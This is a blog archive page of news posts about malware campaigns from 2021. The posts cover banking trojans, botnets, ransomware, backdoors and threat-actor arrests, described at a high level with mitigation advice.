Search This Blog

Showing posts with label malware. Show all posts

Numando: a Banking Trojan Targeting Brazil Abuses YouTube for Spreading

 

ESET researchers have continued their investigation on the Latin American banking trojans with Numando, primarily targeting Brazil and seldom Mexico and Spain in particular. This time it disassembles. Numando is comparable in its use of phony overlay windows, backdoor capability, and the manipulation of utilities such as YouTube to maintain remote configuration to the other malware families. However, Numando doesn't show symptoms of continual evolution, as did several of the Latin American banking trojans. 

Numando is operational since 2018, focusing entirely on Brazil but rare attacks are focused on consumers in Mexico and Spain were reported by specialists. This financial malware, which was written in Delphi, shows bogus overlaying windows to mislead victims into entering sensitive data, including bank services information. 

It spreads exclusively via spam and phishing campaigns. Such efforts aren't precisely sophisticated, and just a few hundred victims were found at the time of writing. As a consequence, it seems Numando is "considerably less successful" than others, such as Mekotio and Grandoreiro, across Latin America. 

The absence of complexity of the operator has probably helped to achieve a low rate of infection. Recent campaigns comprise spam addressed to Numando, which includes an email with a phishing message and a.ZIP attachment. 

“Some Numando variants store these images in an encrypted ZIP archive inside their .rsrc sections, while others utilize a separate Delphi DLL just for this storage. Backdoor capabilities allow Numando to simulate mouse and keyboard actions, restart and shut down the machine, display overlay windows, take screenshots and kill browser processes.” reads the analysis published by ESET. “Unlike other Latin American banking trojans, however, the commands are defined as numbers rather than strings, which inspired our naming of this malware family.” 

A decoy. ZIP file and a genuine file are downloaded containing a. CAB archive — with a valid software application included — an injector, and the Trojan. The malware is hidden within a large . BMP picture file. The injecter is laterally loaded and the malware is decrypted using an XOR method and a key for the software program is implemented. 

Numando will build counterfeit overlays whenever a victim visits financial services once downloaded on a targeted system. If users give their credentials, they are taken and forwarded to the C2 server of the malware. In addition to managing remote configuration settings, Numando exploits public services, particularly Pastebin and YouTube. Numando may also replicate mouse clicks and key shell operations; hijack the shutdown of a PC and restart operations.

Attackers Use Cryptomining Malware to Target Organizations

 

Earlier this year in June, a security researcher from security firm Sonatype uncovered six malicious payloads in the official Python programming language’s PyPI repository that were laced with cryptomining malware. 

The attackers used typo-squatted names for the malicious payloads that were downloaded more than 5000 times. All the packages were posted on PyPI by the author “nedog123,” some as early as April of this year. Attackers used typosquats to trick people into thinking they were normal programs and hide their main purpose of hijacking developer systems for cryptomining. 

The PyPI event is complex because it combines three different kinds of attacks: logic bombs, cryptojacking, and software supply chain attacks. The risk posed by these kinds of attacks requires immediate action from organizations if they want to shield their database. 

Logic Bomb Attacks 

A logic bomb also known as 'code bomb', cyber bomb, or slag code is a malicious piece of code that gets executed under specific conditions, usually with a malicious purpose. One challenge with logic bomb attacks is that they are sneaky in nature and can go undetected for long periods of time. 

All the logic bomb attacks vary in form and function from one another which help malicious actors to install logic bombs that victim can’t easily detect. The logic bomb attacks are used for various purposes like stealing data, deleting or corrupting data, locking systems, or launching cryptomining processes.

Cryptojacking 

Cryptojacking, the illicit hijacking of computers, smartphones, or even servers to mine cryptocurrency. Attackers can steal huge bandwidth and compute energy, and, in the end, financial resources as it works to solve the equations needed for mining currency. In fact, the high resource demand — the high cost of cryptomining — is exactly why attackers are stealing it with cryptomining malware. Threat actors use crypto-malware because its behavior is hard to predict. In addition, it’s a foot in the door for other kinds of payloads and breaches. 

Software supply chain attack

Software supply chain attack, the most common method to target organizations by adding malicious code in third-party software with the aim of compromising applications that use that software. According to the State of the Software Supply Chain report, supply chain attacks have increased by a staggering 650% year-on-year, versus a figure of 430% last year. 

“Next-generation software supply chain attacks are far more sinister, because bad actors are no longer waiting for public vulnerability disclosures to pursue an exploit. Instead, they are taking the initiative and injecting new vulnerabilities into open source projects that feed the global supply chain, and then exploiting those vulnerabilities before they are discovered,” the report noted. 

How to mitigate the risks 

Organizations are advised to follow the steps mentioned below to protect their database: 

• Use trusted antivirus software 
• Perform regular OS updates 
• Avoid downloading apps from untrusted sources 
• Use red team tests to learn how supply chain attacks could play out within your organization and figure out how to best respond 
• Blacklist mining sites, pirate software sites, and other sites are likely to lead to shady downloads 
• Disable JavaScript, if feasible 
• Train employees on basic digital safety awareness and practices.

New Android Banking Malware Targeting Mexican Users to Steal Financial Credentials

 

McAfee Mobile Malware Research Team has discovered an android banking malware targeting Mexican users by posing as a security banking tool or as a banking app designed to report an out-of-service ATM. 

In both scenarios, the banking malware depends on the sense of urgency to tempt targets to use the malicious app. If the target falls into a trap, this banking malware steals authentication factors crucial to accessing accounts on the targeted financial institutions in Mexico.

How does this malware spread?

Scammers use malicious phishing page that provides real banking security tips (copied from the original bank site) to lure potential victims into downloading a malicious app as a security tool or as an app to report out-of-service ATM. 

Researchers believe scammers are targeting android users by scam phone calls, a common methodology in Latin America. Fortunately, this malicious app has not been identified on Google Play yet, it can only be downloaded through a third-party website. 

Here’s how to protect yourself 

During the Covid-19 pandemic, financial institutions adopted various new ways to engage the clients. These rapid changes meant customers were more willing to accept new procedures and to install new apps as part of the ‘new normal’ to interact remotely. Seeing this, cyber-criminals introduced new scams and phishing attacks that looked more credible than those in the past. 

Android banking users in Mexico are advised to be cautious while accessing emails and attachments, and restrict themselves from downloading an app via unsecured websites. Organizations and individuals should keep their systems updated with the latest security patches for the operating systems and applications. They should also enable multi-factor authentication on their accounts, if possible, McAfee Mobile Malware Research Team advised.

Last month, researchers at the security firm ThreatFabric discovered a banking malware dubbed “Vultur” in Android apps downloaded from Google Play, it attempts to steal banking login information. The Vultur malware used code to recognize when a data entry form is being used by the victim then takes a screen grab, and finally begins keylogging. All of the data captured by the malware is then routed to a site specified by its designers.

Sidewalk Backdoor Being Used By China-Linked Grayfly Gang

 

A recent study on a backdoor called Sidewalk has shown its attribution with Grayfly, the Chinese spy arm termed the APT41 group that used to attack telecoms in the US, Taiwan, Vietnam, and Mexico. Grayfly exploits publicly accessible Web servers to deploy web shells, according to Symantec, for initial infiltration before any further propagation in the system. 

Symantec states that the backdoor is linked to a former Crosswalk backdoor and that according to a report released in August, the security company ESET credits its evolution to a new gang called SparklingGoblin. Symantec's Threat Hunter Team has now associated the malware to Grayfly, GREF, and Wicked Panda, a Chinese spy outfit that had many members convicted last year in the United States. Although sometimes referred to as APT41, Symantec regards Grayfly as the spy offshoot of APT41. According to ESET experts, SparklingGoblin is also connected to the Winnti malware family. 

However, from the beginning of 2017 Grayfly has been operational. Five Chinese Nationals have been convicted of breaching more than 100 enterprises, government agencies, and other organizations around the world by the U.S. Department of Justice in September 2020. 

"Once a network has been compromised, Grayfly may install its custom backdoors onto additional systems," Symantec says. "These tools allow the attackers to have comprehensive remote access to the network and proxy connections allowing them to access hard-to-reach segments of a target's network." 

The intruder loaded a bespoke version of the Mimikatz credential dumping tool once the destination machine was created. The program enables attackers to access the system and proxy connections from a distant point of view, providing attackers access to any portion of the network of the target. Grayfly employs the back door of the Sidewalk besides the Trojan custom loader. 

Researchers from Symantec investigated one such attack and noticed the very first indication when an Exchange Server-related Base64-encoded command PowerShell was performed. The attacker then executed the certutil command, which empties and shows the certification authority, using the PowerShell command to decrypt and deploy a web shell. After that, the attacker immediately launched its second PowerShell Base64 encoded command that transferred the web shell to the installation path for Exchange. A few minutes later, according to the Symantec analysis, a backdoor was carried out via installutil.exe. Approximately an hour later, the attackers issued a WMIC command which ran a Windows batch file, and generated a programmed job to run the backdoor, experts say. 

Grayfly activated the proprietary Mimikatz program to dump credentials as the last phase in this attack, claims the report. 

Expect more to come, researchers said: “Grayfly is a capable actor, likely to continue to pose a risk to organizations in Asia and Europe across a variety of industries, including telecommunications, finance, and media. It’s likely this group will continue to develop and improve its custom tools to enhance evasion tactics along with using commodity tools such as publicly available exploits and web shells to assist in their attacks.”

43% of all Malware Installations are Concealed in Microsoft Office Documents

 

Companies have now employed hundreds of cloud applications to use due to the transition from work from the office to remote work, many of which may be vulnerable to cyberattacks or exploitation. This has increased the attack vector and exposed them to a slew of new threats. 

Although infiltrating office documents with malware has been around for a long period, it is indeed very effective in duping individuals. After embedding a hostile macro into an office document, malicious actors transmit the infected file to thousands of other people via email and wait for potential targets. A macro is a collection of commands that are packed together to perform a task automatically. 

Thus according to current Atlas VPN team research, malicious office documents account for 43 percent of all malware installations. Dangerous office files are common amongst cybercriminals because they can evade suspicion by most antivirus programs. 

The research is based on the Netskope Threat Lab Cloud and Threat Report: July 2021 Edition. It examined office documents from all platforms, including Microsoft Office 365, Google Docs, PDFs, and others. Only 14 percent of all downloaded malware were hostile office documents a year earlier, in the second quarter of 2020. Following that, in the third quarter of last year, the percentage rose to 38%. This growth was mostly affected by working remotely, as attackers discovered that malware-infected papers have proved to be beneficial. 

The effectiveness of EMOTET appears to have spread swiftly among cybercriminal gangs, motivating other hackers to adopt a similar approach. Another reason harmful documents succeed is that they can avoid detection by antivirus software and appear to be from a reliable source. 

Malware-infected document cyberattacks are designed to exploit the user's potential incapacity to perceive the danger. Only a blend of cybersecurity knowledge, training, and security software could provide the highest level of protection.

Fraudsters have taken advantage of Microsoft Office and Google Docs' popularity by introducing malicious code into the documents. To protect users from malware attacks, organizations must design and maintain a cybersecurity plan that addresses both the technological and human components. 

Alleged TrickBot Gang Member Arrested While Leaving South Korea




A Russian native – on accusations of being associated with the TrickBot cybercrime gang – was recently arrested by the authorities at Seoul International airport, while trying to leave South Korea. 

Reportedly, the Russian resident – identified as Mr. A by media –  was leaving for his home in Russia after waiting for over a year in the South Asian country. As per local media reports (Seoul's KBS) the alleged individual was prevented from leaving South Korea due to COVID-19 travel restrictions – international travel had been canceled by Seoul officials as the global pandemic broke out. Subsequently, Mr. A's passport expired, and he was stranded in South Korea as he waited to renew his passport. 

The Russian man who allegedly worked as a web browser developed for the malware spreading TrickBot gang in 2016 during his stay in Russia, denied 'being aware' of working for a cybercrime group. “When developing the software, the user manual did not identify malware,” said the individual at Seoul High Court. 

As per a Korean newspaper, on September 01, an interrogation was held at the 20th Criminal Division of the Seoul High Court – for the extradition request case against the alleged developer of the malware. While fighting the US extradition attempt, the lawyer of the accused argued that the US will prosecute the man unjustly. "If you send it to the United States, it will be very difficult to exercise your right of defense and there is a good chance that you will be subject to excessive penalties,” claimed the attorney. 

As per the reports, the suspect continued to maintain that the operation manual did not fall under malicious software when he developed the software. He received work from TrickBot via a job search site, following which he developed a web browser for the gang, according to The Record. Notably, the recruiters preferred applicants who did not ask a lot of questions. 

TrickBot is an advanced banking trojan that targets Windows machines. Initially created to steal the banking information of unsuspecting users, TrickBot has evolved over the last five years to be versatile, widely available, and easy to use. With new variants being increasingly released, TrickBot infections have become more frequent on home office networks; continuous advancement since its inception has cemented TrickBot's reputation as a highly adaptive modular malware.

Pirated Software Used To Distribute Malware

 

Another persistent operation has now been discovered by researchers that employ a network of websites that function as a "dropper as a service" to distribute a package of malware payloads to users looking for a "cracked" version of the popular business and consumer programs. Such malware incorporates numerous sorts of click scam bots, data stealers, and sometimes even ransomware. 

The cyberattack operates by exploiting several WordPress-hosted lure pages containing "download" links to software applications, which, once clicked by the user, redirect the person to a third party website which distributes potentially unwanted browser plug-ins and malware, including installers for Raccoon Stealer, Stop ransomware, the Glupteba backdoor, and a wide range of malevolent cryptocurrency miners that pretend to be an antivirus software for the system. 

"Visitors who arrive on these sites are prompted to allow notifications; If they allow this to happen, the websites repeatedly issue false malware alerts," the Sophos researchers said. "If the users click the alerts, they're directed through a series of websites until they arrive at a destination that's determined by the visitor's operating system, browser type, and geographic location." 

Links to the web pages appear at the top of search results whenever a user searches for illegal copies of a comprehensive range of software apps using strategies such as search engine optimization. These actions, which are thought to be the result of an illicit marketplace for paid download services, enable entry-level cybercriminals to establish and customize operations depending on the geographic targeting. 

Traffic exchanges, as the allocation infrastructure is also known, generally require a Bitcoin payment before associates can start creating accounts and begin disseminating installers, with web pages like InstallBest providing advice on "best practices," like advising against the use of Cloudflare-based servers for downloaders, along with URLs within Discord's CDN, Bitbucket, or other cloud platforms. 

In addition, the researchers discovered several companies that, rather than providing their particular malware delivery networks, function as "go-betweens" to established malvertising networks that compensate website owners for traffic. 

Earlier in June, a cryptocurrency miner known as Crackonosh was discovered misusing the technique to download a coin miner software known as XMRig to silently compromise the affected host's resources to mine Monero. A month later, the criminals behind MosaicLoader malware were discovered targeting people looking for pirated software as part of an international attempt to install a fully-featured backdoor susceptible to hooking vulnerable Windows systems into a botnet.

Mozi Botnet Creators Arrested by Chinese Law Enforcement Authorities

 

Cybersecurity researchers from the Chinese information security firm Netlab Qihoo 360 reported that at the beginning of this year the authors of the Mozi IoT botnet were detained by Chinese law enforcement authorities, nearly two years after the malware appeared on the threat landscape in late 2019.

“Mozi uses a P2P [peer-to-peer] network structure, and one of the 'advantages' of a P2P network is that it is robust, so even if some of the nodes go down, the whole network will carry on, and the remaining nodes will still infect other vulnerable devices, that is why we can still see Mozi spreading," said Netlab researchers.

The development takes place within two weeks after Microsoft Security Threat Intelligence Center disclosed the malware's new capabilities allows it to block the web traffic on compromised systems via techniques such as DNS spoofing and HTTP session hijacking aimed at redirecting users to malicious domains. 

At its peak, the malware infected up to 160,000 systems a day and in total managed to compromise more than 1,500,000 different devices, more than half of which (830,000) were located in China, according to a report from Netlab Qihoo 360. 

Mozi, which emerged from the source code of Mirai variants and the Gafgyt malware, has accumulated over 15,800 unique command and control nodes as of April 2020, up from 323 nodes in December 2019, according to a report from Lumen's Black Lotus Labs. By the time the malware was discovered by 360 Netlab researchers, it was actively targeting Netgear, D-Link, and Huawei routers by probing for weak Telnet passwords to compromise them.

Exploiting the use of weak and default remote access passwords as well as through unpatched vulnerabilities, the botnet propagates by infecting routers and digital video recorders to co-opt the devices into an IoT botnet, which could be abused for launching distributed denial-of-service (DDoS) attacks, data exfiltration, and payload execution. 

According to Netlab, the creators of Mozi also packed in additional upgrades, which includes a mining trojan that spreads in a worm-like fashion through weak FTP and SSH passwords, expanding on the botnet's features by following a plug-in like approach to designing custom tag commands for different functional nodes. "This convenience is one of the reasons for the rapid expansion of the Mozi botnet," the researchers said. 

"The Mozi botnet samples have stopped updating for quite some time, but this does not mean that the threat posed by Mozi has ended. Since the parts of the network that are already spread across the Internet have the ability to continue to be infected, new devices are infected every day,” the researchers warned. 

The malware also used the DHT protocol to design a peer-to-peer (P2P) system between all the compromised devices, allowing bots to send updates and operational instructions to each other directly, which also allowed Mozi to continue to perform even without a central command and control (C&C) server.

FIN7 Hackers Using 'Windows 11 Alpha' Themed Malicious Documents to Drop JavaScript Backdoor



In a recent wave of the spear-phishing campaign, the FIN7 cybercrime group employed Windows 11 Alpha-themed weaponized word documents to deliver a JavaScript payload with a JavaScript backdoor. 

'Phishing Email Campaign' is the initial attack vector, posing as 'Windows 11 Alpha', it contains an infected Microsoft Word document (.doc). The virus is accompanied by this image which convinces a user to click on 'Enable Editing' and further advance towards the installation process. Once the user enables the content, the VBA macro that is contained in the image begins to come into effect. 

VBA macro is populated with junk data such as comments, it is a common strategy employed by criminals to impede analysis. Once the junk data is being pulled out, all we would be left with is a 'VBA macro'. Upon further analyzing the JavaScript, researchers learned that it contained obfuscated strings along with a deobfuscation function. 

Researchers have found that the threat actors behind the malicious campaign – upon detecting languages of certain countries including Russia, Slovenia, Serbia, Estonia, and Ukraine – call into action the 'me2XKr' function to delete all the tables and then stops running. They do so in order to prevent execution in the aforementioned countries. 

Primarily targeting the U.S.-based telecommunications, education, retail, finance, and hospitality sectors via meticulously crafted attacks, FIN7 has managed to stay ahead of law enforcement by employing novel and advanced techniques to thwart detection from time and again. The threat group, also identified by some as "Carbanak Group", has increasingly diversified its monetization tactics which allowed the gang to widen the impact of their compromise. As a result, the group acquired a competitive advantage and has targeted a wide range of industries. Although FIN7 is characterized by its mass payment card data theft, the ambitions of the threat group are not limited to the theft of payment card data. In scenarios where end-to-end encryption (E2EE) prevented the attackers to obtain card data, they turned to attack the finance departments of the targeted organizations. 

In an analysis dated 02 September 2021, Anomali Threat Research said, "The specified targeting of the Clearmind domain fits well with FIN7's preferred modus operandi." "The group's goal appears to have been to deliver a variation of a JavaScript backdoor used by FIN7 since at least 2018."

PRIVATELOG Relies on Common Log File System to Evade Detection

 

Researchers have revealed data about a new malware family that uses the Common Log File System (CLFS) to conceal a second-stage payload in registry transaction files in order to avoid detection. The malware, named PRIVATELOG, and its installer, STASHLOG, were discovered by FireEye's Mandiant Advanced Practices team. Details about the threat actor's identity and motivations are still unknown. 

CLFS (Common Log File System) is a general-purpose logging subsystem for producing high-performance transaction logs that is available to both kernel-mode and user-mode applications. It debuted with Windows Server 2003 R2 and has since been incorporated into subsequent Windows operating systems. CLFS can be used for event logging as well as data logging. TxF and TxR employ CLFS to save transactional state changes before committing a transaction. Any integrated Windows utility will not be able to examine the Binary Log File(s) created by CLFS. 

CLFS's goal, like that of any other transactional logging system, is to record a series of steps required for a particular activity so that they can be accurately replayed in the future to commit the transaction to secondary storage or undone if necessary.

Despite the fact that the malware has yet to be found in real-world attacks aimed at consumer environments or seen launching any second-stage payloads, Mandiant believes PRIVATELOG is still in development, might be the work of a researcher, or could be used in a highly targeted attack. 

“Because the file format is not widely used or documented, there are no available tools that can parse CLFS log files. This provides attackers with an opportunity to hide their data as log records in a convenient way, because these are accessible through API functions. This is similar in nature to malware which may rely, for example, on the Windows Registry or NTFS Extended Attributes to hide their data, which also provide locations to store and retrieve binary data with the Windows API.” explained Mandiant researchers.

PRIVATELOG and STASHLOG have features that allow malicious software to remain undetected on infected machines, such as the use of obfuscated strings and control flow techniques that are specifically designed to make static analysis difficult. 

Mandiant researchers examined a PRIVATELOG sample that is an un-obfuscated 64-bit DLL named prntvpt.dll that contains exports that are similar to those found in legal prntvpt.dll files. By hijacking the search order used to load DLLs, PRIVATELOG expects to be loaded from PrintConfig.dll. YARA rules are provided by Mandiant to detect PRIVATELOG and STASHLOG malware, as well as it's variations.

VIP72: 15-Year-Old Malware Proxy Network Goes 'Dark' Without Notice



A 15-year-old cybercrime anonymity service called VIP72, in the past, allowed a large number of cybercriminals to cover up their actual location by routing traffic via dozens of hacked computers seeded with malware – suddenly went offline for a period of two weeks and has not shown any signs of return. 

Similar to other proxy networks advertised on the darknet and other cybercrime forums, VIP72 also routed its clients' traffic via systems that have been infected by malware. Employing the malicious service, users could choose network nodes in almost any of the countries to relay their traffic as they conceal themselves behind some unsuspecting user's URL. 

Over the past few days, the darknet has been flooded with  "R.I.P" texts for the malware proxy network, VIP72 that went dark without any prior notice. Initially, the authors of VIP62 told their customers that they will be back online shortly, indicating it's a maintenance issue that's restricting their operations. “Sorry for the inconvenience but we're performing some maintenance at the moment. We'll be back online shortly!”, read a notice titled “We'll be back soon!” 

It was updated to read, “Socks client will be unavailable within next 5 (FIVE) days for planned upgrades. We will resume normal work of socks client till the end of this week. All active subscriptions will have +8 days to existed paid period.” 

“—We only work on web vip72.com and sellvip72.com/en. Do not access fraudulent websites on google search e.g: vip72.cx, .us etc...”, the notice further read in 'red' letter font. 

Originally set up in 2006, VIP72, had a long run assisting malicious actors in concealing their real location via a well-founded proxy service. Basically, the proxying service of VIP72 effectively obscured the identity and true location of malware campaigners by routing their traffic via multiple network bounces. In a nutshell, VIP72 essentially offered its customers safety from the security police. 

However, ironically enough, the U.S.-hosted proxy service itself has presumably faced something serious, perhaps, a case of policing. Other experts speculate, that VIP72 might have experienced trouble in competing against newly emerged sophisticated anonymity network services. Although the reason behind VIP72's sudden disappearance remains unclear and the website has gone offline for two weeks now, the proxy service is still accessible to some of the users, which makes sense as the compromised hosts would still be infected with the malware and will indefinitely continue to forward traffic for as long as they remain under the effect of proxy malware.

To Disseminate Malware, Hackers are Increasingly Relying on DaaS Platforms

 

According to cybersecurity specialists, malware authors are increasingly depending on dropper-as-a-service (DaaS) platforms to propagate their malicious inventions. Sophos recently published a report detailing the rise of DaaS platforms that infect victims who visit piracy websites in search of cracked versions of major business and consumer software. 

A dropper is a programme that, when run, executes malicious code as a payload. The dropper is similar to a trojan, and it may have additional functions, but its primary goal is to get malware onto a victim's computer, which can be downloaded over the internet or unpacked from data within the dropper.

A customer pays for a dropper-as-a-service to deliver their malware to these systems through droppers. Typically, the DaaS employs a network of websites to transmit droppers to victims' computers, which then install and execute the customer's malware. Droppers could be camouflaged as legitimate or cracked software that netizens are fooled into installing. 

“During our recent investigation into an ongoing Raccoon Stealer (an information-stealing malware) campaign, we found that the malware was being distributed by a network of websites acting as a “dropper as a service,” serving up a variety of other malware packages,” Sophos researchers Sean Gallagher, Yusuf Polat shared in a joint blog post. 

The Sophos duo, who were assisted by Anand Ajjan and Andrew Brandt, dubbed this part of the "malware-industrial complex," saying that such services made it "very inexpensive for would-be cybercriminals with limited expertise to get started" in the criminal underworld. For 1,000 virus installs using droppers, some of these firms charge as little as $2. 

The researchers point out that DaaS frequently bundles a variety of unrelated malware in a single dropper, including click-fraud bots, information stealers, and even ransomware.

The Raccoon Stealer campaign was not the only one that used DaaS, according to the researchers. Sophos continued to see more malware and other dangerous information transmitted over the same network of sites even after the campaign had stopped. “We discovered multiple networks using the same basic tactics in our research. All of these networks use search engine optimization to put a “bait” webpage on the first page of results for search engine queries seeking “crack” versions of a variety of software products,” said the researchers.

Hackers are Selling Tool to Hide Malware in GPUs

 

Cybercriminals are moving towards malware attacks that can execute code from a hacked system's graphics processing unit (GPU). Although the approach is not new, and demo code has been published in the past, most of the projects to date have come from academics or were unfinished and unpolished. 

Recently in August, the proof-of-concept (PoC) was sold on a hacker forum, perhaps signaling hackers' shift to a new level of complexity in their attacks. 

Code Tested on Intel, AMD, and Nvidia GPUs

In a brief post on a hacking forum, someone offered to sell the proof-of-concept (PoC) for a strategy that keeps harmful code protected from security solutions scanning the system RAM. The seller gave a brief description of their technique, claiming that it stores malicious code in the GPU memory buffer and then executes it from there. 

As per the advertiser, the project only works on Windows PCs that support OpenCL 2.0 and above for executing code on various processors, including GPUs. It also stated that he tested the code on Intel (UHD 620/630), Radeon (RX 5700), and GeForce (GTX 740M(? ), GTX 1650) graphics cards. 

However, there are fewer details regarding this new hack, but the post went live on August 8 and was apparently sold for an unknown amount on August 25.

Another hacker forum user mentioned that GPU-based malware had been done before, citing JellyFish, a six-year proof-of-concept for a Linux-based GPU rootkit. 

The vendor dismissed the links to the JellyFish malware, stating that their approach is unique and does not rely on code mapping to userspace. There is no information regarding the transaction, such as who purchased it or how much they paid. Only the seller's article claims to have sold the malware to an unidentified third party. 

Academic Study

Researchers at the VX-Underground threat repository stated in a tweet on Sunday that the malicious code allows binary execution by the GPU in its memory region. They also noted that the technique will be demonstrated soon. 

PoCs for a GPU-based keylogger and a GPU-based remote access trojan for Windows were also disclosed by the same researchers that created the JellyFish rootkit. All three projects were released in May 2015 and are open to the public. 

While the mention of the JellyFish project implies that GPU-based malware is a new idea, the foundation for this attack approach was developed around eight years ago. 

Researchers from the Institute of Computer Science - Foundation for Research and Technology (FORTH) in Greece and Columbia University in New York demonstrated in 2013 that GPUs can execute a keylogger and save recorded keystrokes in their memory space [PDF document here]. 

The researchers previously evidenced that malware authors may use the GPU's processing capabilities to pack code with extremely sophisticated encryption methods considerably faster than the CPU.

LockFile Ransomware Circumvents Protection Using Intermittent File Encryption

 

A new ransomware threat known as LockFile has been affecting organizations all around the world since July. It surfaced with its own set of tactics for getting beyond ransomware security by using a sophisticated approach known as "intermittent encryption." 

The operators of ransomware, called LockFile, have been found exploiting recently disclosed vulnerabilities like ProxyShell and PetitPotam to attack Windows servers and install file-encrypting malware that scrambles just every alternate 16 bytes of a file, allowing it to circumvent ransomware defenses. 

Mark Loman, Sophos director of engineering, said in a statement, "Partial encryption is generally used by ransomware operators to speed up the encryption process, and we've seen it implemented by BlackMatter, DarkSide, and LockBit 2.0 ransomware.” 

"What sets LockFile apart is that, unlike the others, it doesn't encrypt the first few blocks. Instead, LockFile encrypts every other 16 bytes of a document." 

"This means that a file such as a text document remains partially readable and looks statistically like the original. This trick can be successful against ransomware protection software that relies on inspecting content using statistical analysis to detect encryption," Loman added. 

Sophos' LockFile analysis is based on evidence published to VirusTotal on August 22, 2021. Once installed, the virus uses the Windows Management Interface (WMI) to terminate important services linked with virtualization software and databases before encrypting critical files and objects and displaying a ransomware message that looks similar to LockBit 2.0's. 

The ransom message further asks the victim to contact "contact@contipauper.com," which Sophos believes they are referencing a rival ransomware organization named Conti. 
 
Furthermore, after successfully encrypting all of the documents on the laptop, the ransomware erases itself from the system, indicating "there is no ransomware binary for incident responders or antivirus software to identify or clear up." 

Loman warned that the takeaway for defenders is that the cyberthreat landscape never sits still, and adversaries will rapidly grasp any chance or weapon available to conduct a successful attack. 

The disclosures come as the U.S FBI published a Flash report outlining the tactics of a new Ransomware-as-a-Service (RaaS) group known as Hive, which consists of many actors who use multiple mechanisms to attack business networks, steal data, encrypt data on the networks, and attempt to collect a ransom in exchange for access to the decryption keys.

Phorpiex Malware has Shut Down their Botnet and Put its Source Code for Sale

 

The Phorpiex malware's creators have shut down their botnet and are selling the source code on a dark web cybercrime forum. The ad states that none of the malware's two original authors are participating in maintaining the botnet, which is why they opted to sell its source code. It was posted on 27th August by an individual previously associated with the botnet's operation. 

Phorpiex, a long-running botnet notorious for extortion schemes and old-school worms delivered via removable USB drives and instant messaging programmes, has been broadening its architecture in recent years in order to become more durable and deliver more deadly payloads. 

These operations had extended to encompass bitcoin mining, which had previously included extortion and spamming. Researchers have noticed an upsurge in data exfiltration and ransomware delivery since 2018, with the bot installer releasing malware such as Avaddon, Knot, BitRansomware (DSoftCrypt/ReadMe), Nemty, GandCrab, and Pony, among others. 

“As I no longer work and my friend has left the biz, I’m here to offer Trik (name from coder) / Phorpiex (name fomr AV firms) source for sell [sic],” the individual said on Friday in a forum post spotted by British security firm Cyjax. 

The ad's legitimacy was confirmed by Alexey Bukhteyev, a malware reverse engineer for security firm Check Point. “The description of the malware is very similar to what we saw in the code,” Bukhteyev said. The malware's command and control (C&C) servers have been inactive for approximately two months, according to the researcher, who previously researched the Phorpiex virus in 2019. 

The last command the bot received from the Phorpiex C&C servers was on July 6, 2021, according to Bukhteyev, who has been running a phoney Phorpiex bot in order to spy on its operations. The command was a self-explanatory "SelfDeletion" instruction. The botnet appears to have vanished from open-source reports since then. 

"As we know, the source code is private and hasn’t been sold before. Therefore, this [forum ad] looks really believable,” Bukhteyev said. “However, we can be totally sure if we buy it. The binaries are quite straightforward, and we can easily confirm that the source code is for this bot indeed, if we get it."

Even if the botnet C&C servers are down, Bukhteyev warns that if someone buys the code, they can set up new ones and hijack all the already infected systems.

CISA Published MARs on Samples Targeting Pulse Secure Devices

 

Five new research reports outlining malware detected on compromised Pulse Secure devices were issued this week by the US Cybersecurity and Infrastructure Security Agency (CISA). Adversaries have been targeting Pulse Connect Secure VPN appliances to exploit a variety of vulnerabilities, including CVE-2021-22893 and CVE-2021-22937, which were found earlier this year.

CISA issued an alert in April this year on assaults on Pulse Secure devices, along with indicators of compromise (IOCs) and details on the malware used by the attackers. Threat actors' tactics, techniques, and procedures (TTPs) are detailed in the malware analysis reports (MARs). 

CVE-2021-22893 is a buffer overflow vulnerability in Pulse Connect Secure Collaboration Suite prior to version b9.1R11.4 that allows remote authenticated attackers to execute arbitrary code as the root user through a maliciously crafted meeting room. Two hacking groups have used the zero-day vulnerability in Pulse Secure VPN equipment to break into the networks of US defence contractors and government institutions around the world, according to reports issued by FireEye and Pulse Secure in May. 

CVE-2021-22937 is a high-severity remote code execution vulnerability in Pulse Connect Secure's admin web interface. A remote attacker might use the weakness to overwrite arbitrary files and gain root-level code execution. The bug has a CVSS score of 9.1 and is the consequence of a bypass of the patch provided in October 2021 to address the CVE-2020-8260 issue, according to experts. Early this month, Ivanti corrected a major code execution issue in Pulse Connect Secure VPN. 

According to CISA, two of the samples are maliciously modified Pulse Secure files received from compromised machines, both of which are credential harvesters. One of the files also serves as a backdoor, allowing attackers to access the hacked device remotely. A malicious shell script in another file might log usernames and passwords. A third sample consisted of many files, one of which had a shell script for converting a Pulse Secure file to a web shell. One file was created to intercept certificate-based multi-factor authentication, while others were created to read web request data.

Two Perl scripts designed to execute attacker instructions, a Perl library, a Perl script, and a shell script designed to manipulate and execute the 'bin/umount' file were included in the fifth sample.

Joker Virus is Back, Targeting Android Devices

 

The notorious Joker has made a comeback, according to Belgian police, who cautioned about the Joker Virus that only targets Android smartphones and lurks in numerous apps available on the Google marketplace known as Play Store. 

The Joker malware is among the most tenacious and annoying viruses for Android, and it is even capable of infecting people through the use of the Google Play Store since it is disguised within defenseless apps. This Joker software can completely deplete victims' bank account of all funds. The 'Joker' Trojan infection is part of the Bread malware family, whose primary goal is to hijack cell phone bills and allow activities without the user's knowledge. 

As per experts at cybersecurity firm Quick Heal Security Lab, the Joker virus could access user smartphone's text messages, contact information, and a variety of other data, enabling it to enroll in websites providing premium services. Due to this users face the danger of receiving a large bill from their bank or credit card at the end of the month. 

"This malicious program has been detected in eight Play Store applications that Google has suppressed," stated the Belgian authorities in a statement published on Friday 20th August on their website. 

The 'Joker' malware made headlines in 2017 for attacking and stealing data from its victims while masquerading in several applications. Since that day, Google Play Store defense systems have deleted approximately 1,700 apps containing the 'Joker' malware before they could be installed by users. The 'Joker' virus was discovered in 24 Android applications in September 2020, with over 500 thousand downloads before even being deactivated. It is suspected that more than 30 countries were impacted at the time, along with the United States, Brazil, and Spain. Hackers might take up to $7 (approximately 140 Mexican pesos) per subscription weekly via illicit memberships, an amount that has most certainly escalated in recent months. 

According to La Razón, the cybersecurity firm Zscaler has publicly revealed the names of 16 other apps that, according to its investigation, also include this dangerous code: Private SMS, Hummingbird PDF Converter - Photo to PDF, Style Photo Collage, Talent Photo Editor - Blur focus, Paper Doc Scanner, All Good PDF Scanner, Care Message, Part Message, Blue Scanner, Direct Messenger, One Sentence Translator - Multifunctional Translator, Mint Leaf Message-Your Private Message, Unique Keyboard - Fancy Fonts & Free Emoticons, Tangram App Lock, Desire Translate and Meticulous Scanner. 

